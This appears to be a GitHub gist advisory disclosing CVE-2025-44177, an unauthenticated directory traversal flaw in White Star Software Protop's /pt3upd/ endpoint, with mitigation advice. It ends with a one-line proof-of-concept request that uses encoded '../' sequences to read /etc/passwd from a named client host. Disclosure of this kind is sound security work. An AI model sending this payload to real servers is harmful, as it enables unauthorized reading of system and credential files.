Skip to content

Instantly share code, notes, and snippets.

@stSLAYER

stSLAYER/CVE-2025-44177-Protop-LFI.md

Last active July 8, 2025 14:19
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save stSLAYER/4a2ecfbab1215a0be0dde59c4ac0122d to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save stSLAYER/4a2ecfbab1215a0be0dde59c4ac0122d to your computer and use it in GitHub Desktop.
Download ZIP
Raw
CVE-2025-44177-Protop-LFI.md

CVE-2025-44177 - Local File Inclusion in White Star Software Protop v4.4.2-2024-11-27

Discovered by: Imraan Khan (Lich-Sec)
Date: 2025-03-13
Product: White Star Software Protop
Version: 4.4.2-2024-11-27
CVE ID: CVE-2025-44177

Vulnerability Summary

A directory traversal vulnerability exists in White Star Software Protop v4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint. An unauthenticated attacker can remotely access arbitrary files on the server by sending crafted requests using encoded traversal sequences.

Affected Instances

This affects all client environments hosted on subdomains such as *.protop.co.za (e.g., client.protop.co.za).

Mitigation

The vendor has releaseed an updated patch. Update to the latest version.

References

CVE ID: CVE-2025-44177 (pending publication)
URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-44177

Proof of Concept (PoC)

GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: client.protop.co.za
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment